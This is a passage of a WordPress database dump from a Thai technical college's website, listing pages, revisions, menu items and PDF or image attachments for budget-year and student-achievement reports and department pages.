(2386, 3, '2018-05-08 10:21:08', '2018-05-08 03:21:08', '<h4><a href=\"http://www.technicrayong.ac.th/รายงานผล2560\"><span style=\"color: #ff00ff;\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2560<--</span></a></h4>\r\n<h4> <span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/รายงานผล2559\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2559<--</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/รายงานผล2558\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2558<--</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/รายงานผล2557\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2557<--</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ-2556.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2556<--</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/รายงานผลปี-2555.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2555<--</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/รายงานผล-การปฏิบัติงาน-และการใช้จ่ายเงินงบประมาณ-2554.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2554<--</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\">--><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/รายงานผล-การปฏิบัติงาน-และการใช้จ่ายเงินงบประมาณ-2553.pdf\">รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2553<--</a></span></h4>\r\n ', 'รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ', '', 'inherit', 'closed', 'closed', '', '1706-revision-v1', '', '', '2018-05-08 10:21:08', '2018-05-08 03:21:08', '', 1706, 'http://www.technicrayong.ac.th/1706-revision-v1/', 0, 'revision', '', 0),
(2388, 3, '2018-05-08 10:36:58', '2018-05-08 03:36:58', '<a href=\"/%e0%b8%8a%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b8%ad%e0%b8%b4%e0%b9%80%e0%b8%a5%e0%b9%87%e0%b8%81%e0%b8%97%e0%b8%a3%e0%b8%ad%e0%b8%99%e0%b8%b4%e0%b8%81%e0%b8%aa%e0%b9%8c/1-20/\"><img class=\"alignnone size-full wp-image-11910\" src=\"/wp-content/uploads/2021/07/1.jpg\" alt=\"\" width=\"3508\" height=\"2480\" /></a> <a href=\"/%e0%b8%8a%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b8%ad%e0%b8%b4%e0%b9%80%e0%b8%a5%e0%b9%87%e0%b8%81%e0%b8%97%e0%b8%a3%e0%b8%ad%e0%b8%99%e0%b8%b4%e0%b8%81%e0%b8%aa%e0%b9%8c/2-15/\"><img class=\"alignnone size-full wp-image-11911\" src=\"/wp-content/uploads/2021/07/2-1.png\" alt=\"\" width=\"3508\" height=\"2480\" /></a>', 'ช่างอิเล็กทรอนิกส์', '', 'publish', 'closed', 'closed', '', '%e0%b8%8a%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b8%ad%e0%b8%b4%e0%b9%80%e0%b8%a5%e0%b9%87%e0%b8%81%e0%b8%97%e0%b8%a3%e0%b8%ad%e0%b8%99%e0%b8%b4%e0%b8%81%e0%b8%aa%e0%b9%8c', '', '', '2021-07-01 11:17:24', '2021-07-01 04:17:24', '', 0, 'http://www.technicrayong.ac.th/?page_id=2388', 0, 'page', '', 0),
(2389, 3, '2018-05-08 10:34:45', '2018-05-08 03:34:45', '', '8-5-2561 10-32-12', '', 'inherit', 'closed', 'closed', '', '8-5-2561-10-32-12', '', '', '2018-05-08 10:34:45', '2018-05-08 03:34:45', '', 2388, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/8-5-2561-10-32-12.jpg', 0, 'attachment', 'image/jpeg', 0),
(2390, 3, '2018-05-08 10:34:50', '2018-05-08 03:34:50', '', '8-5-2561 10-33-02', '', 'inherit', 'closed', 'closed', '', '8-5-2561-10-33-02', '', '', '2018-05-08 10:34:50', '2018-05-08 03:34:50', '', 2388, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/8-5-2561-10-33-02.jpg', 0, 'attachment', 'image/jpeg', 0),
(2391, 3, '2018-05-08 10:34:55', '2018-05-08 03:34:55', '', '8-5-2561 10-33-32', '', 'inherit', 'closed', 'closed', '', '8-5-2561-10-33-32', '', '', '2018-05-08 10:34:55', '2018-05-08 03:34:55', '', 2388, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/8-5-2561-10-33-32.jpg', 0, 'attachment', 'image/jpeg', 0),
(2392, 3, '2018-05-08 10:35:00', '2018-05-08 03:35:00', '', '8-5-2561 10-34-14', '', 'inherit', 'closed', 'closed', '', '8-5-2561-10-34-14', '', '', '2018-05-08 10:35:00', '2018-05-08 03:35:00', '', 2388, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/8-5-2561-10-34-14.jpg', 0, 'attachment', 'image/jpeg', 0),
(2393, 3, '2018-05-08 10:35:04', '2018-05-08 03:35:04', '', '8-5-2561 10-34-44', '', 'inherit', 'closed', 'closed', '', '8-5-2561-10-34-44', '', '', '2018-05-08 10:35:04', '2018-05-08 03:35:04', '', 2388, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/8-5-2561-10-34-44.jpg', 0, 'attachment', 'image/jpeg', 0),
(2394, 3, '2018-05-08 10:36:58', '2018-05-08 03:36:58', '<img class=\"aligncenter wp-image-2389 size-full\" src=\"/wp-content/uploads/2018/05/8-5-2561-10-32-12.jpg\" alt=\"\" width=\"189\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-2390\" src=\"/wp-content/uploads/2018/05/8-5-2561-10-33-02.jpg\" alt=\"\" width=\"379\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-2391 size-full\" src=\"/wp-content/uploads/2018/05/8-5-2561-10-33-32.jpg\" alt=\"\" width=\"958\" height=\"643\" />\r\n\r\n<img class=\"aligncenter wp-image-2392 size-full\" src=\"/wp-content/uploads/2018/05/8-5-2561-10-34-14.jpg\" alt=\"\" width=\"957\" height=\"632\" />\r\n\r\n<img class=\"aligncenter wp-image-2393 size-full\" src=\"/wp-content/uploads/2018/05/8-5-2561-10-34-44.jpg\" alt=\"\" width=\"957\" height=\"639\" />', 'ช่างอิเล็กทรอนิกส์', '', 'inherit', 'closed', 'closed', '', '2388-revision-v1', '', '', '2018-05-08 10:36:58', '2018-05-08 03:36:58', '', 2388, 'http://www.technicrayong.ac.th/2388-revision-v1/', 0, 'revision', '', 0),
(2396, 3, '2018-05-08 11:56:15', '2018-05-08 04:56:15', '<a href=\"/%e0%b8%8a%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b8%81%e0%b9%88%e0%b8%ad%e0%b8%aa%e0%b8%a3%e0%b9%89%e0%b8%b2%e0%b8%87/1-15/\"><img class=\"alignnone size-full wp-image-11884\" src=\"/wp-content/uploads/2021/06/1-3.png\" alt=\"\" width=\"3508\" height=\"2480\" /></a> <a href=\"/%e0%b8%8a%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b8%81%e0%b9%88%e0%b8%ad%e0%b8%aa%e0%b8%a3%e0%b9%89%e0%b8%b2%e0%b8%87/2-11/\"><img class=\"alignnone size-full wp-image-11885\" src=\"/wp-content/uploads/2021/06/2-2.png\" alt=\"\" width=\"3508\" height=\"2480\" /></a>', 'ช่างก่อสร้าง', '', 'publish', 'closed', 'closed', '', '%e0%b8%8a%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b8%81%e0%b9%88%e0%b8%ad%e0%b8%aa%e0%b8%a3%e0%b9%89%e0%b8%b2%e0%b8%87', '', '', '2021-06-28 12:47:50', '2021-06-28 05:47:50', '', 0, 'http://www.technicrayong.ac.th/?page_id=2396', 0, 'page', '', 0),
(2397, 3, '2018-05-08 11:54:23', '2018-05-08 04:54:23', '', '8-5-2561 11-54-19', '', 'inherit', 'closed', 'closed', '', '8-5-2561-11-54-19', '', '', '2018-05-08 11:54:23', '2018-05-08 04:54:23', '', 2396, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/8-5-2561-11-54-19.jpg', 0, 'attachment', 'image/jpeg', 0),
(2398, 3, '2018-05-08 11:54:27', '2018-05-08 04:54:27', '', '8-5-2561 11-54-30', '', 'inherit', 'closed', 'closed', '', '8-5-2561-11-54-30', '', '', '2018-05-08 11:54:27', '2018-05-08 04:54:27', '', 2396, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/8-5-2561-11-54-30.jpg', 0, 'attachment', 'image/jpeg', 0),
(2399, 3, '2018-05-08 11:54:33', '2018-05-08 04:54:33', '', '8-5-2561 11-54-55', '', 'inherit', 'closed', 'closed', '', '8-5-2561-11-54-55', '', '', '2018-05-08 11:54:33', '2018-05-08 04:54:33', '', 2396, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/8-5-2561-11-54-55.jpg', 0, 'attachment', 'image/jpeg', 0),
(2400, 3, '2018-05-08 11:54:35', '2018-05-08 04:54:35', '', '8-5-2561 11-55-23', '', 'inherit', 'closed', 'closed', '', '8-5-2561-11-55-23', '', '', '2018-05-08 11:54:35', '2018-05-08 04:54:35', '', 2396, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/8-5-2561-11-55-23.jpg', 0, 'attachment', 'image/jpeg', 0),
(2401, 3, '2018-05-08 11:56:15', '2018-05-08 04:56:15', '<img class=\"aligncenter wp-image-2397 size-full\" src=\"/wp-content/uploads/2018/05/8-5-2561-11-54-19.jpg\" alt=\"\" width=\"195\" height=\"242\" />\r\n\r\n<img class=\"aligncenter wp-image-2398\" src=\"/wp-content/uploads/2018/05/8-5-2561-11-54-30.jpg\" alt=\"\" width=\"389\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-2399 size-full\" src=\"/wp-content/uploads/2018/05/8-5-2561-11-54-55.jpg\" alt=\"\" width=\"957\" height=\"632\" />\r\n\r\n<img class=\"aligncenter wp-image-2400 size-full\" src=\"/wp-content/uploads/2018/05/8-5-2561-11-55-23.jpg\" alt=\"\" width=\"956\" height=\"631\" />', 'ช่างก่อสร้าง', '', 'inherit', 'closed', 'closed', '', '2396-revision-v1', '', '', '2018-05-08 11:56:15', '2018-05-08 04:56:15', '', 2396, 'http://www.technicrayong.ac.th/2396-revision-v1/', 0, 'revision', '', 0),
(2403, 3, '2018-05-08 11:57:11', '0000-00-00 00:00:00', '', '', '', 'draft', 'closed', 'closed', '', '', '', '', '2018-05-08 11:57:11', '2018-05-08 04:57:11', '', 0, 'http://www.technicrayong.ac.th/?page_id=2403', 0, 'page', '', 0),
(2404, 3, '2018-05-08 13:17:37', '2018-05-08 06:17:37', '', 'สามัญสัมพันธ์', '', 'publish', 'closed', 'closed', '', '%e0%b8%aa%e0%b8%b2%e0%b8%a1%e0%b8%b1%e0%b8%8d%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c', '', '', '2022-04-29 12:30:35', '2022-04-29 05:30:35', '', 0, 'http://www.technicrayong.ac.th/?p=2404', 87, 'nav_menu_item', '', 0),
(2405, 3, '2018-05-08 13:17:37', '2018-05-08 06:17:37', '', 'สังคมศึกษา', '', 'publish', 'closed', 'closed', '', '%e0%b8%aa%e0%b8%b1%e0%b8%87%e0%b8%84%e0%b8%a1%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9%e0%b8%b2', '', '', '2022-04-29 12:30:35', '2022-04-29 05:30:35', '', 0, 'http://www.technicrayong.ac.th/?p=2405', 88, 'nav_menu_item', '', 0),
(2406, 3, '2018-05-08 13:17:37', '2018-05-08 06:17:37', '', 'สุขศึกษาและพลศึกษา', '', 'publish', 'closed', 'closed', '', '%e0%b8%aa%e0%b8%b8%e0%b8%82%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9%e0%b8%b2%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b8%9e%e0%b8%a5%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9%e0%b8%b2', '', '', '2022-04-29 12:30:35', '2022-04-29 05:30:35', '', 0, 'http://www.technicrayong.ac.th/?p=2406', 89, 'nav_menu_item', '', 0),
(2407, 3, '2018-05-08 13:17:37', '2018-05-08 06:17:37', '', 'ภาษาไทย', '', 'publish', 'closed', 'closed', '', '%e0%b8%a0%e0%b8%b2%e0%b8%a9%e0%b8%b2%e0%b9%84%e0%b8%97%e0%b8%a2', '', '', '2022-04-29 12:30:35', '2022-04-29 05:30:35', '', 0, 'http://www.technicrayong.ac.th/?p=2407', 90, 'nav_menu_item', '', 0),
(2408, 3, '2018-05-08 13:17:38', '2018-05-08 06:17:38', '', 'วิทยาศาสตร์', '', 'publish', 'closed', 'closed', '', '%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b9%8c', '', '', '2022-04-29 12:30:36', '2022-04-29 05:30:36', '', 0, 'http://www.technicrayong.ac.th/?p=2408', 91, 'nav_menu_item', '', 0),
(2409, 3, '2018-05-08 13:17:38', '2018-05-08 06:17:38', '', 'คณิตศาสตร์', '', 'publish', 'closed', 'closed', '', '%e0%b8%84%e0%b8%93%e0%b8%b4%e0%b8%95%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b9%8c', '', '', '2022-04-29 12:30:36', '2022-04-29 05:30:36', '', 0, 'http://www.technicrayong.ac.th/?p=2409', 92, 'nav_menu_item', '', 0),
(2410, 3, '2018-05-08 13:17:38', '2018-05-08 06:17:38', '', 'ภาษาต่างประเทศ', '', 'publish', 'closed', 'closed', '', '%e0%b8%a0%e0%b8%b2%e0%b8%a9%e0%b8%b2%e0%b8%95%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%97%e0%b8%a8', '', '', '2022-04-29 12:30:36', '2022-04-29 05:30:36', '', 0, 'http://www.technicrayong.ac.th/?p=2410', 93, 'nav_menu_item', '', 0),
(2418, 3, '2018-05-09 16:00:17', '2018-05-09 09:00:17', '<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2019/02/รายงานผลสัมฤทธิ์ทางการเรียน-ปีการศึกษา-2560.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2560</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2019/02/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียนระดับ-ปีการศึกษา-2559.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2559</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2558.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2558</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2557.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2557</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2556.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2556</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2555.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2555</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2554.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2554</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2553.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2553</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2552.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2552</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2551.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2551</a></span></h3>\r\n<h3></h3>', 'รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา', '', 'publish', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9c%e0%b8%a5%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%a4%e0%b8%97%e0%b8%98%e0%b8%b4%e0%b9%8c%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3', '', '', '2019-02-18 13:36:09', '2019-02-18 06:36:09', '', 0, 'http://www.technicrayong.ac.th/?page_id=2418', 0, 'page', '', 0),
(2419, 3, '2018-05-09 16:00:17', '2018-05-09 09:00:17', '<h3><span style=\"color: #ff00ff;\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2561</span></h3>\r\n<h3><span style=\"color: #ff00ff;\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2560</span></h3>\r\n<h3><span style=\"color: #ff00ff;\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2559</span></h3>\r\n<h3><span style=\"color: #ff00ff;\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2558</span></h3>\r\n<h3><span style=\"color: #ff00ff;\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2557</span></h3>\r\n<h3><span style=\"color: #ff00ff;\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2556</span></h3>\r\n<h3><span style=\"color: #ff00ff;\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2555</span></h3>\r\n<h3><span style=\"color: #ff00ff;\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2554</span></h3>\r\n<h3><span style=\"color: #ff00ff;\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2553</span></h3>\r\n<h3><span style=\"color: #ff00ff;\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2552</span></h3>\r\n<h3><span style=\"color: #ff00ff;\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2551</span></h3>\r\n<h3></h3>', 'รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา', '', 'inherit', 'closed', 'closed', '', '2418-revision-v1', '', '', '2018-05-09 16:00:17', '2018-05-09 09:00:17', '', 2418, 'http://www.technicrayong.ac.th/2418-revision-v1/', 0, 'revision', '', 0),
(2421, 3, '2018-05-09 16:02:53', '2018-05-09 09:02:53', '', 'รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2551', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9c%e0%b8%a5%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%a4%e0%b8%97%e0%b8%98%e0%b8%b4%e0%b9%8c%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3-2', '', '', '2018-05-09 16:02:53', '2018-05-09 09:02:53', '', 2418, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2551.pdf', 0, 'attachment', 'application/pdf', 0),
(2422, 3, '2018-05-09 16:02:57', '2018-05-09 09:02:57', '', 'รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2552', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9c%e0%b8%a5%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%a4%e0%b8%97%e0%b8%98%e0%b8%b4%e0%b9%8c%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3-3', '', '', '2018-05-09 16:02:57', '2018-05-09 09:02:57', '', 2418, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2552.pdf', 0, 'attachment', 'application/pdf', 0),
(2423, 3, '2018-05-09 16:02:59', '2018-05-09 09:02:59', '', 'รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2553', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9c%e0%b8%a5%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%a4%e0%b8%97%e0%b8%98%e0%b8%b4%e0%b9%8c%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3-4', '', '', '2018-05-09 16:02:59', '2018-05-09 09:02:59', '', 2418, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2553.pdf', 0, 'attachment', 'application/pdf', 0),
(2424, 3, '2018-05-09 16:03:01', '2018-05-09 09:03:01', '', 'รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2554', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9c%e0%b8%a5%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%a4%e0%b8%97%e0%b8%98%e0%b8%b4%e0%b9%8c%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3-5', '', '', '2018-05-09 16:03:01', '2018-05-09 09:03:01', '', 2418, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2554.pdf', 0, 'attachment', 'application/pdf', 0),
(2425, 3, '2018-05-09 16:03:03', '2018-05-09 09:03:03', '', 'รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2555', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9c%e0%b8%a5%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%a4%e0%b8%97%e0%b8%98%e0%b8%b4%e0%b9%8c%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3-6', '', '', '2018-05-09 16:03:03', '2018-05-09 09:03:03', '', 2418, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2555.pdf', 0, 'attachment', 'application/pdf', 0),
(2426, 3, '2018-05-09 16:04:45', '2018-05-09 09:04:45', '', 'รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2556', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9c%e0%b8%a5%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%a4%e0%b8%97%e0%b8%98%e0%b8%b4%e0%b9%8c%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3-7', '', '', '2018-05-09 16:04:45', '2018-05-09 09:04:45', '', 2418, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2556.pdf', 0, 'attachment', 'application/pdf', 0),
(2427, 3, '2018-05-09 16:04:50', '2018-05-09 09:04:50', '', 'รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2557', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9c%e0%b8%a5%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%a4%e0%b8%97%e0%b8%98%e0%b8%b4%e0%b9%8c%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3-8', '', '', '2018-05-09 16:04:50', '2018-05-09 09:04:50', '', 2418, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2557.pdf', 0, 'attachment', 'application/pdf', 0),
(2428, 3, '2018-05-09 16:04:53', '2018-05-09 09:04:53', '', 'รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2558', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9c%e0%b8%a5%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%a4%e0%b8%97%e0%b8%98%e0%b8%b4%e0%b9%8c%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3-9', '', '', '2018-05-09 16:04:53', '2018-05-09 09:04:53', '', 2418, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2558.pdf', 0, 'attachment', 'application/pdf', 0),
(2429, 3, '2018-05-09 16:05:41', '2018-05-09 09:05:41', '<h3><span style=\"color: #ff00ff;\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2561</span></h3>\r\n<h3><span style=\"color: #ff00ff;\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2560</span></h3>\r\n<h3><span style=\"color: #ff00ff;\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2559</span></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2558.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2558</a></h3>\r\n<h3><span style=\"color: #ff00ff;\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2557</span></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2556.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2556</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2555.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน 